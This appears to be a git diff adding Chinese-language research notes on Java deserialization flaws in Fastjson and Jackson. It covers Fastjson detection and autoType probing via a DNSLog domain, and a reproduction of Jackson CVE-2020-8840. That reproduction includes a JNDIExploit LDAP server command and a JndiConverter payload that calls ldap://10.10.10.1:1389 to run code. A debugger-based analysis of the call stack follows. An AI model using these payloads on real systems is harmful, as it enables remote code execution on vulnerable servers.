b/mechanism/serialization/fastjson/note/img/851600c7f7064b3880112b15398e90cc.png differ diff --git a/mechanism/serialization/fastjson/note/img/93afd2976fce487d85794a41f6700d65.png b/mechanism/serialization/fastjson/note/img/93afd2976fce487d85794a41f6700d65.png new file mode 100644 index 00000000..32d7e441 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/93afd2976fce487d85794a41f6700d65.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/96fe4f4cf45e4c5f90be821790f7f886.png b/mechanism/serialization/fastjson/note/img/96fe4f4cf45e4c5f90be821790f7f886.png new file mode 100644 index 00000000..e00fcf56 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/96fe4f4cf45e4c5f90be821790f7f886.png differ diff --git a/mechanism/serialization/fastjson/note/img/b10c111ecfdc47dbae548a7399f87d6c.png b/mechanism/serialization/fastjson/note/img/b10c111ecfdc47dbae548a7399f87d6c.png new file mode 100644 index 00000000..107da599 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/b10c111ecfdc47dbae548a7399f87d6c.png differ diff --git a/mechanism/serialization/fastjson/note/img/b3b9433c7dbc44f996f5b3f62dddab12.png b/mechanism/serialization/fastjson/note/img/b3b9433c7dbc44f996f5b3f62dddab12.png new file mode 100644 index 00000000..8621ddbc Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/b3b9433c7dbc44f996f5b3f62dddab12.png differ diff --git a/mechanism/serialization/fastjson/note/img/b942e530762240f5958692b6ce15a035.png b/mechanism/serialization/fastjson/note/img/b942e530762240f5958692b6ce15a035.png new file mode 100644 index 00000000..83f33bab Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/b942e530762240f5958692b6ce15a035.png differ diff --git a/mechanism/serialization/fastjson/note/img/dbda66813d5f44b5907b320492185242.png b/mechanism/serialization/fastjson/note/img/dbda66813d5f44b5907b320492185242.png new file mode 100644 index 00000000..bd61509e Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/dbda66813d5f44b5907b320492185242.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/dcf784b91c1549b3bb3a38dee5f28511.png b/mechanism/serialization/fastjson/note/img/dcf784b91c1549b3bb3a38dee5f28511.png new file mode 100644 index 00000000..f6f24a2a Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/dcf784b91c1549b3bb3a38dee5f28511.png differ diff --git a/mechanism/serialization/fastjson/note/img/eaaa5eee918f49238b531632a1b3eb76.png b/mechanism/serialization/fastjson/note/img/eaaa5eee918f49238b531632a1b3eb76.png new file mode 100644 index 00000000..082fcf27 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/eaaa5eee918f49238b531632a1b3eb76.png differ diff --git a/mechanism/serialization/fastjson/note/img/f9f936a04b554b6482f90ec8e5b020c7.png b/mechanism/serialization/fastjson/note/img/f9f936a04b554b6482f90ec8e5b020c7.png new file mode 100644 index 00000000..e70ea19b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/f9f936a04b554b6482f90ec8e5b020c7.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220108230455188.png b/mechanism/serialization/fastjson/note/img/image-20220108230455188.png new file mode 100644 index 00000000..e56f22bc Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220108230455188.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220108231345721.png b/mechanism/serialization/fastjson/note/img/image-20220108231345721.png new file mode 100644 index 00000000..58dcec94 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220108231345721.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110010458402.png b/mechanism/serialization/fastjson/note/img/image-20220110010458402.png new file mode 100644 index 00000000..adaad96f Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110010458402.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/image-20220110010946944.png b/mechanism/serialization/fastjson/note/img/image-20220110010946944.png new file mode 100644 index 00000000..044bc7d0 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110010946944.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110011301258.png b/mechanism/serialization/fastjson/note/img/image-20220110011301258.png new file mode 100644 index 00000000..f0fc889c Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110011301258.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110011637089.png b/mechanism/serialization/fastjson/note/img/image-20220110011637089.png new file mode 100644 index 00000000..d48e4a13 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110011637089.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110012516629.png b/mechanism/serialization/fastjson/note/img/image-20220110012516629.png new file mode 100644 index 00000000..daa9104e Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110012516629.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110013037847.png b/mechanism/serialization/fastjson/note/img/image-20220110013037847.png new file mode 100644 index 00000000..77b229cc Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110013037847.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110013253942.png b/mechanism/serialization/fastjson/note/img/image-20220110013253942.png new file mode 100644 index 00000000..7cf3e410 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110013253942.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/image-20220110014102136.png b/mechanism/serialization/fastjson/note/img/image-20220110014102136.png new file mode 100644 index 00000000..022ab62b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110014102136.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110014358909.png b/mechanism/serialization/fastjson/note/img/image-20220110014358909.png new file mode 100644 index 00000000..7b628c1a Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110014358909.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110014625513.png b/mechanism/serialization/fastjson/note/img/image-20220110014625513.png new file mode 100644 index 00000000..9320b884 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110014625513.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110015047912.png b/mechanism/serialization/fastjson/note/img/image-20220110015047912.png new file mode 100644 index 00000000..d72e43a4 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110015047912.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110015312401.png b/mechanism/serialization/fastjson/note/img/image-20220110015312401.png new file mode 100644 index 00000000..37d20082 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110015312401.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110015633886.png b/mechanism/serialization/fastjson/note/img/image-20220110015633886.png new file mode 100644 index 00000000..74038d25 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110015633886.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/image-20220110020122733.png b/mechanism/serialization/fastjson/note/img/image-20220110020122733.png new file mode 100644 index 00000000..207fc714 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110020122733.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110020346569.png b/mechanism/serialization/fastjson/note/img/image-20220110020346569.png new file mode 100644 index 00000000..0000890a Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110020346569.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110020750595.png b/mechanism/serialization/fastjson/note/img/image-20220110020750595.png new file mode 100644 index 00000000..39f07341 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110020750595.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110021423356.png b/mechanism/serialization/fastjson/note/img/image-20220110021423356.png new file mode 100644 index 00000000..b614b8c1 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110021423356.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110021553549.png b/mechanism/serialization/fastjson/note/img/image-20220110021553549.png new file mode 100644 index 00000000..a69f8cbc Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110021553549.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110022127739.png b/mechanism/serialization/fastjson/note/img/image-20220110022127739.png new file mode 100644 index 00000000..cad67090 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110022127739.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/image-20220110022835890.png b/mechanism/serialization/fastjson/note/img/image-20220110022835890.png new file mode 100644 index 00000000..7ca7b43d Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110022835890.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110023158446.png b/mechanism/serialization/fastjson/note/img/image-20220110023158446.png new file mode 100644 index 00000000..f1304d9f Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110023158446.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110023509406.png b/mechanism/serialization/fastjson/note/img/image-20220110023509406.png new file mode 100644 index 00000000..d065b338 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110023509406.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110023906262.png b/mechanism/serialization/fastjson/note/img/image-20220110023906262.png new file mode 100644 index 00000000..5825e250 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110023906262.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110024153294.png b/mechanism/serialization/fastjson/note/img/image-20220110024153294.png new file mode 100644 index 00000000..22a7209a Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110024153294.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110025245969.png b/mechanism/serialization/fastjson/note/img/image-20220110025245969.png new file mode 100644 index 00000000..885c03d6 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110025245969.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/image-20220110030044227.png b/mechanism/serialization/fastjson/note/img/image-20220110030044227.png new file mode 100644 index 00000000..82052af7 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110030044227.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110031401317.png b/mechanism/serialization/fastjson/note/img/image-20220110031401317.png new file mode 100644 index 00000000..40a48087 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110031401317.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110031605273.png b/mechanism/serialization/fastjson/note/img/image-20220110031605273.png new file mode 100644 index 00000000..cdbbf70f Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110031605273.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110032229069.png b/mechanism/serialization/fastjson/note/img/image-20220110032229069.png new file mode 100644 index 00000000..a5935ff8 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110032229069.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110033000831.png b/mechanism/serialization/fastjson/note/img/image-20220110033000831.png new file mode 100644 index 00000000..d90c7a8b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110033000831.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110033704985.png b/mechanism/serialization/fastjson/note/img/image-20220110033704985.png new file mode 100644 index 00000000..d90c7a8b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110033704985.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/image-20220110033852412.png b/mechanism/serialization/fastjson/note/img/image-20220110033852412.png new file mode 100644 index 00000000..c3e82000 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110033852412.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110033930830.png b/mechanism/serialization/fastjson/note/img/image-20220110033930830.png new file mode 100644 index 00000000..aa9605fa Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110033930830.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110034219641.png b/mechanism/serialization/fastjson/note/img/image-20220110034219641.png new file mode 100644 index 00000000..120e9b6f Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110034219641.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110034337153.png b/mechanism/serialization/fastjson/note/img/image-20220110034337153.png new file mode 100644 index 00000000..cf3e79f4 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110034337153.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110034754508.png b/mechanism/serialization/fastjson/note/img/image-20220110034754508.png new file mode 100644 index 00000000..930e082e Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110034754508.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110034944896.png b/mechanism/serialization/fastjson/note/img/image-20220110034944896.png new file mode 100644 index 00000000..4b48c78b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110034944896.png differ 
diff --git a/mechanism/serialization/fastjson/note/img/image-20220110035255396.png b/mechanism/serialization/fastjson/note/img/image-20220110035255396.png new file mode 100644 index 00000000..8d0e48c9 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110035255396.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110040523386.png b/mechanism/serialization/fastjson/note/img/image-20220110040523386.png new file mode 100644 index 00000000..27a03d65 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110040523386.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110042918567.png b/mechanism/serialization/fastjson/note/img/image-20220110042918567.png new file mode 100644 index 00000000..4d405007 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110042918567.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110113731767.png b/mechanism/serialization/fastjson/note/img/image-20220110113731767.png new file mode 100644 index 00000000..701052f3 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110113731767.png differ diff --git "a/mechanism/serialization/fastjson/note/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/mechanism/serialization/fastjson/note/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..6a625379 --- /dev/null +++ "b/mechanism/serialization/fastjson/note/345円210円251円347円224円250円347円240円224円347円251円266円.md" 
@@ -0,0 +1,200 @@ +漏洞探测 +--- + +### 探测 Fastjson +```text +无害判断后端的 json 处理组件是否为 fastjson +``` +#### DNSLog + +- [通过dnslog探测fastjson的几种方法](https://gv7.me/articles/2020/several-ways-to-detect-fastjson-through-dnslog/) +- [发现最新版本1.2.67依然可以通过dnslog判断后端是否使用fastjson](https://github.com/alibaba/fastjson/issues/3077) `讨论区很精彩` + +### 版本识别 + +#### 触发异常回显 +- 适用于会返回异常的场景,出不出网都可 + +特殊业务场景,抛出异常信息 +- 为什么说`特殊`,因为很多场景不一定会回显 + +```java + @ResponseBody + public String parseObjectHandler(@RequestBody String dataStr) { + try { + JSONObject data = JSON.parseObject(dataStr); + return dataStr; + } catch (Exception e) { + return "error: " + e.getMessage(); + } + } +``` + +- 已测试 + - v1.2.23 + - v1.2.47(default) + - v1.2.68(default) + - v1.2.76(default) + - v1.2.80(default)-> v1.2.76(代码就是这样写的 !) + - v1.2.83 + +```text +// https://b1ue.cn/archives/402.html +{"@type":"java.lang.AutoCloseable" +``` +![](img/dcf784b91c1549b3bb3a38dee5f28511.png) + +![](img/93afd2976fce487d85794a41f6700d65.png) + +![](img/eaaa5eee918f49238b531632a1b3eb76.png) + + +v1.2.80 -> v1.2.76 ??? 
`果然眼见也不一定为实` + +- com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer + +![](img/41a2f918a49c41b7ac62521bafa778cb.png) + +![](img/32e2b52cedb344d5be39ed880c30e134.png) + +#### DNSLog + 黑名单 + +- 适用于出网无回显的场景 + +思路: +根据每个版本所内置的黑名单不同,去加载相关的类来判断 +- 加载成功 -> 不报错 +- 加载失败 -> 报错 + + + +参考: +https://github.com/LeadroyaL/fastjson-blacklist + +#### 延时 + +##### JNDI -> SSRF + +##### DoS + + +### 判断 autoType 是否开启 + +判断autoType是否开启,选择利用链。 + +``` +[{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}] +``` + +- DNSLog有解析记录 -> autoType 开启 / fastjson < v1.2.24 +- DNSLog没有解析记录 -> autoType 未开启 + + +### 探测 Gadget +思路: +通过加载相关Gadget的类是否成功来判断该利用链是否存在。 + + + + +漏洞利用 +--- + +### HTTP + +#### c3p0 - URLClassLoader + +- https://tttang.com/archive/1411/#toc_urlclassloader + +### JNDI + +- 利用条件限制 + - [Bypass](https://paper.seebug.org/942/#4-jdk-8u191) + +``` +RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 +LADP利用JDK版本≤ 6u211 、7u201、8u191 +``` + +#### rt - JdbcRowSetImpl + + +#### c3p0 + +- https://tttang.com/archive/1411/#toc_jndi + +#### ibatis / mybatis - JndiDataSourceFactory + +- org.apache.ibatis.datasource.jndi.JndiDataSourceFactory.setProperties + - initCtx.lookup("可控") + + +```text +public void setProperties(Properties properties) { + try { + Properties env = getEnvProperties(properties); + InitialContext initCtx; + if (env == null) { + initCtx = new InitialContext(); + } else { + initCtx = new InitialContext(env); + } + + if (properties.containsKey("initial_context") && properties.containsKey("data_source")) { + Context ctx = (Context)initCtx.lookup(properties.getProperty("initial_context")); + this.dataSource = (DataSource)ctx.lookup(properties.getProperty("data_source")); + } else if (properties.containsKey("data_source")) { + this.dataSource = (DataSource)initCtx.lookup(properties.getProperty("data_source")); + } +``` + +#### xbean-reflect - JndiConverter + + + +### 不出网 + +- [FastJson 
RCE不出网利用研究](https://mp.weixin.qq.com/s/nKPsoNkHtNdOj-_v53Bc9w) + +#### tomcat-dbcp/commons-dbcp - BasicDataSource + BCEL + +- https://github.com/depycode/fastjson-local-echo + + +#### c3p0 + +- https://github.com/depycode/fastjson-c3p0 + +- [JAVA反序列化之C3P0不出网利用](http://www.yulegeyu.com/2021/10/10/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BC3P0%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) + +#### rt - TemplatesImpl - 鸡肋 + +利用条件: + +Feature.SupportNonPublicField 需要开启,因为_bytecodes 和 _outputProperties 两个关键属性是私有的 + +#### commons-io 文件操作 + +- [fastjson 读文件 gadget 的利用场景扩展](https://b1ue.cn/archives/506.html) +- [Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析](https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg) + + +#### rt - MarshalOutputStream 文件操作 + +- [fastjson v1.2.68 RCE利用链复现](https://mp.weixin.qq.com/s?__biz=MzI4OTQ5Njc2Mw==&mid=2247484334&idx=1&sn=825221db6e7d0ba3b7b4713ac3bf68fa&chksm=ec2f087adb58816c3b4aab28d2d53f2a22617233bd91ad8e4887a1724dc1747ab9ffc03c5c93&scene=126&&sessionid=1663752244#rd) + + +#### ibatis/mybatis - UnpooledDataSource + BCEL + + +代码审计 +--- + +``` +.parseObject() +.parse() +``` + + + + diff --git a/mechanism/serialization/jackson/note/README.md b/mechanism/serialization/jackson/note/README.md new file mode 100644 index 00000000..a2d8e0eb --- /dev/null +++ b/mechanism/serialization/jackson/note/README.md 
@@ -0,0 +1,327 @@ + + +# 相关漏洞 + +## RCE + +### CVE-2020-8840 + +#### 漏洞描述 + +- JNDI注入 -> RCE + +- 影响范围(存疑) + +```shell +# https://nvd.nist.gov/vuln/detail/CVE-2020-8840 +v2.0.0 through v2.9.10.2 +# 本地测试版本 +v2.10.1 +``` + +- 利用条件 + - 开启enableDefaultTyping() + - 存在第三方依赖:xbean-reflect + +#### 漏洞复现 + +##### 环境搭建 + +pom.xml + +```xml + + com.fasterxml.jackson.core + jackson-databind + 2.10.1 + + + + com.fasterxml.jackson.core + jackson-databind + 2.10.1 + + + + com.fasterxml.jackson.core + jackson-annotations + 2.10.1 + + + + org.apache.xbean + xbean-reflect + 4.15 + +``` + +PayloadRunner.java + +```java +import com.fasterxml.jackson.core.JsonProcessingException; +import com.fasterxml.jackson.databind.ObjectMapper; + + +public class PayloadRunner { + public static void main(String args[]) throws JsonProcessingException { + ObjectMapper mapper = new ObjectMapper(); + mapper.enableDefaultTyping(); + String evilJson = ""; + mapper.readValue(evilJson, Object.class); + } +} +``` + +##### 漏洞验证 + +LDAP服务端 + +```shell +java -jar .\JNDIExploit-1.4-SNAPSHOT-modified.jar -i 10.10.10.1 +``` + +![image-20220124164807399](img/image-20220124164807399.png) + +Payload-弹计算器 + +```java +// calc +[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://10.10.10.1:1389/62617369632F436F6D6D616E642F63616C63\"}] +``` + +测试效果 + +![image-20220124165036128](img/image-20220124165036128.png) + + + +#### 漏洞分析 + +diff 如下 + +![image-20220124163901495](img/image-20220124163901495.png) + +定位到JndiConverter类,并下断点 + +- org.apache.xbean.propertyeditor.JndiConverter#toObjectImpl + +```java +protected Object toObjectImpl(String text) { + try { + InitialContext context = new InitialContext(); + return (Context)context.lookup(text); + } catch (NamingException var3) { + throw new PropertyEditorException(var3); + } +} +``` + +调用栈 + +```java +forName:334, Class (java.lang) +loadClass:72, VersionHelper12 (com.sun.naming.internal) +loadClass:87, VersionHelper12 (com.sun.naming.internal) 
+getObjectFactoryFromReference:158, NamingManager (javax.naming.spi) +getObjectInstance:189, DirectoryManager (javax.naming.spi) +c_lookup:1085, LdapCtx (com.sun.jndi.ldap) +p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx) +lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx) +lookup:205, GenericURLContext (com.sun.jndi.toolkit.url) +lookup:94, ldapURLContext (com.sun.jndi.url.ldap) +lookup:417, InitialContext (javax.naming) +toObjectImpl:35, JndiConverter (org.apache.xbean.propertyeditor) +toObject:86, AbstractConverter (org.apache.xbean.propertyeditor) +setAsText:59, AbstractConverter (org.apache.xbean.propertyeditor) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +deserializeAndSet:141, MethodProperty (com.fasterxml.jackson.databind.deser.impl) +vanillaDeserialize:288, BeanDeserializer (com.fasterxml.jackson.databind.deser) +deserialize:151, BeanDeserializer (com.fasterxml.jackson.databind.deser) +_deserialize:120, AsArrayTypeDeserializer (com.fasterxml.jackson.databind.jsontype.impl) +deserializeTypedFromAny:71, AsArrayTypeDeserializer (com.fasterxml.jackson.databind.jsontype.impl) +deserializeWithType:712, UntypedObjectDeserializer$Vanilla (com.fasterxml.jackson.databind.deser.std) +deserialize:68, TypeWrappedDeserializer (com.fasterxml.jackson.databind.deser.impl) +_readMapAndClose:4202, ObjectMapper (com.fasterxml.jackson.databind) +readValue:3205, ObjectMapper (com.fasterxml.jackson.databind) +readValue:3173, ObjectMapper (com.fasterxml.jackson.databind) +main:12, PayloadRunner (Deserialization.Jackson) +``` + +可以将调用栈分为两部分 + +- 反序列化:反射调用setter方法 +- JNDI注入:远程动态加载恶意类(非重点) + +##### 基于readValue()的反序列化 + +根据调用栈定位到 + +- `com.fasterxml.jackson.databind.deser.BeanDeserializer#deserialize()` + +```java +public Object deserialize(JsonParser p, DeserializationContext ctxt) throws IOException { + if 
(p.isExpectedStartObjectToken()) { + if (this._vanillaProcessing) { + return this.vanillaDeserialize(p, ctxt, p.nextToken()); + } else { + p.nextToken(); + return this._objectIdReader != null ? this.deserializeWithObjectId(p, ctxt) : this.deserializeFromObject(p, ctxt); + } + } else { + return this._deserializeOther(p, ctxt, p.getCurrentToken()); + } +} +``` + +当前运行时 this._vanillaProcessing 为true + +![image-20220124171929408](img/image-20220124171929408.png) + +跟进 this.vanillaDeserialize() 方法 + +- com.fasterxml.jackson.databind.deser.BeanDeserializer#vanillaDeserialize + +```java +private final Object vanillaDeserialize(JsonParser p, DeserializationContext ctxt, JsonToken t) throws IOException { + Object bean = this._valueInstantiator.createUsingDefault(ctxt); + p.setCurrentValue(bean); + if (p.hasTokenId(5)) { + String propName = p.getCurrentName(); + do { + p.nextToken(); + SettableBeanProperty prop = this._beanProperties.find(propName); + if (prop != null) { + try { + prop.deserializeAndSet(p, ctxt, bean); + } catch (Exception var8) { + this.wrapAndThrow(var8, bean, propName, ctxt); + } + } else { + this.handleUnknownVanilla(p, ctxt, bean, propName); + } + } while((propName = p.nextFieldName()) != null); + } + return bean; +} +``` + +调用 this._valueInstantiator.createUsingDefault() 方法 + +- `com.fasterxml.jackson.databind.deser.std.StdValueInstantiator#createUsingDefault` + - 反射调用其默认构造方法 + +```java +public Object createUsingDefault(DeserializationContext ctxt) throws IOException { + if (this._defaultCreator == null) { + return super.createUsingDefault(ctxt); + } else { + try { + return this._defaultCreator.call(); + } catch (Exception var3) { + return ctxt.handleInstantiationProblem(this._valueClass, (Object)null, this.rewrapCtorProblem(ctxt, var3)); + } + } +} +``` + +回到上一层调用栈,调用到 prop.deserializeAndSet() 方法,跟进 + +- `com.fasterxml.jackson.databind.deser.impl.MethodProperty#deserializeAndSet` + - 反射调用setter方法 + +```java +public void deserializeAndSet(JsonParser p, 
DeserializationContext ctxt, Object instance) throws IOException { + Object value; + if (p.hasToken(JsonToken.VALUE_NULL)) { + if (this._skipNulls) { + return; + } + value = this._nullProvider.getNullValue(ctxt); + } else if (this._valueTypeDeserializer == null) { + value = this._valueDeserializer.deserialize(p, ctxt); + if (value == null) { + if (this._skipNulls) { + return; + } + value = this._nullProvider.getNullValue(ctxt); + } + } else { + value = this._valueDeserializer.deserializeWithType(p, ctxt, this._valueTypeDeserializer); + } + try { + this._setter.invoke(instance, value); + } catch (Exception var6) { + this._throwAsIOE(p, var6, value); + } +} +``` + +![image-20220124173333679](img/image-20220124173333679.png) + +跟进 + +- org.apache.xbean.propertyeditor.AbstractConverter#setAsText + +```java +public final void setAsText(String text) { + Object value = this.toObject(this.trim ? text.trim() : text); + super.setValue(value); +} +``` + +调用 this.toObject() 方法 + +- `org.apache.xbean.propertyeditor.AbstractConverter#toObject` + +```java +public final Object toObject(String text) { + if (text == null) { + return null; + } else { + Object value = this.toObjectImpl(this.trim ? 
text.trim() : text); + return value; + } +} +``` + +调用 this.toObjectImpl() 方法,触发 lookup() 方法,从而达到JNDI注入的效果。 + +- `org.apache.xbean.propertyeditor.JndiConverter#toObjectImpl` + +```java +protected Object toObjectImpl(String text) { + try { + InitialContext context = new InitialContext(); + return (Context)context.lookup(text); + } catch (NamingException var3) { + throw new PropertyEditorException(var3); + } +} +``` + +##### JNDI 注入 + +该部分调用栈 + +```java +forName:334, Class (java.lang) +loadClass:72, VersionHelper12 (com.sun.naming.internal) +loadClass:87, VersionHelper12 (com.sun.naming.internal) +getObjectFactoryFromReference:158, NamingManager (javax.naming.spi) +getObjectInstance:189, DirectoryManager (javax.naming.spi) +c_lookup:1085, LdapCtx (com.sun.jndi.ldap) +p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx) +lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx) +lookup:205, GenericURLContext (com.sun.jndi.toolkit.url) +lookup:94, ldapURLContext (com.sun.jndi.url.ldap) +lookup:417, InitialContext (javax.naming) +``` + +代码执行原理 + +- 远程加载恶意类并实例化 + + diff --git a/mechanism/serialization/jackson/note/img/image-20220124163901495.png b/mechanism/serialization/jackson/note/img/image-20220124163901495.png new file mode 100644 index 00000000..24f852ba Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124163901495.png differ diff --git a/mechanism/serialization/jackson/note/img/image-20220124164807399.png b/mechanism/serialization/jackson/note/img/image-20220124164807399.png new file mode 100644 index 00000000..c9ae1b26 Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124164807399.png differ diff --git a/mechanism/serialization/jackson/note/img/image-20220124165036128.png b/mechanism/serialization/jackson/note/img/image-20220124165036128.png new file mode 100644 index 00000000..8fd6a3f4 Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124165036128.png differ 
diff --git a/mechanism/serialization/jackson/note/img/image-20220124171929408.png b/mechanism/serialization/jackson/note/img/image-20220124171929408.png new file mode 100644 index 00000000..4d88515b Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124171929408.png differ diff --git a/mechanism/serialization/jackson/note/img/image-20220124173333679.png b/mechanism/serialization/jackson/note/img/image-20220124173333679.png new file mode 100644 index 00000000..6edb83a0 Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124173333679.png differ diff --git a/mechanism/serialization/serialVersionUID.md b/mechanism/serialization/serialVersionUID.md new file mode 100644 index 00000000..a649660a --- /dev/null +++ b/mechanism/serialization/serialVersionUID.md @@ -0,0 +1,34 @@ + +#### 0x1 引子 +SerialVesionUID不一致导致反序列化漏洞利用失败也算是实战中比较常见的问题了,面试也会经常提及。 + + +#### 0x2 代码分析 +反序列化的调用栈 +``` +initNonProxy:595, ObjectStreamClass (java.io) +readNonProxyDesc:1829, ObjectInputStream (java.io) +readClassDesc:1713, ObjectInputStream (java.io) +readOrdinaryObject:1986, ObjectInputStream (java.io) +readObject0:1535, ObjectInputStream (java.io) +readObject:422, ObjectInputStream (java.io) +main:18, SerializableDemo2 (serialVersionUID) +``` + +- java.io.ObjectStreamClass#initNonProxy + +![image](https://user-images.githubusercontent.com/55024146/155457995-8eb346c3-e88d-49cc-b7f0-45c9f2a6710b.png) + +对serialVersionUID做了比较,如果发现不相等,则直接抛出异常。 + +- java.io.ObjectStreamClass#getSerialVersionUID + +![image](https://user-images.githubusercontent.com/55024146/155458101-55c08f41-5312-4768-88f2-9df636ecf0b2.png) + +在没有定义serialVersionUID的时候,会调用computeDefaultSUID 